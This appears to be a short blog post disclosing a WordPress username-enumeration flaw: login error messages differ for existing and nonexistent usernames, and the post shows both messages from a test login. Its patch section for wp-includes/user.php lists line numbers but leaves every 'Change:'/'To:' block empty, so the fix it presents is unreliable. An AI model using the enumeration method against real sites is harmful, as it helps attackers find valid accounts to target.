Skip to content

Patch WordPress UserName Disclosure

This 26 may, a researcher (Veronica Valero of Talsoft S.R.L.) posted  a security threat  affecting  WordPress blogs on Direct Object Reference.

A reply posted by “Zerial” on the mailing list explained another vulnerability on WordPress.

It is possible via a simple test on the login box to know if a username is  used on a wordpress blog. The test is pretty simple, it analyse the return message while trying to login on WordPress.

For example on the following website (http://www.noktec.be/wp-admin/)  while trying to log with the user-name “test” (fake)

The return message given when the account was active was :

Error: The password you entered for the username test is incorrect. Lost your password ?

 

The return message given when the account was not active was:

Error: Invalid username. Lost your password ?

This vulnerability was already report in the OSVDB 55713 in 2009 but was still active.

A patch was released by “EthicalHack3r” :

 

wp-includes/user.php:91

Change:

To:

and change

wp-includes/user.php:111

Change:

To:

( source : EthicalHack3r)

 

And that’s it.

Post a Comment

Your email is never published nor shared. Required fields are marked *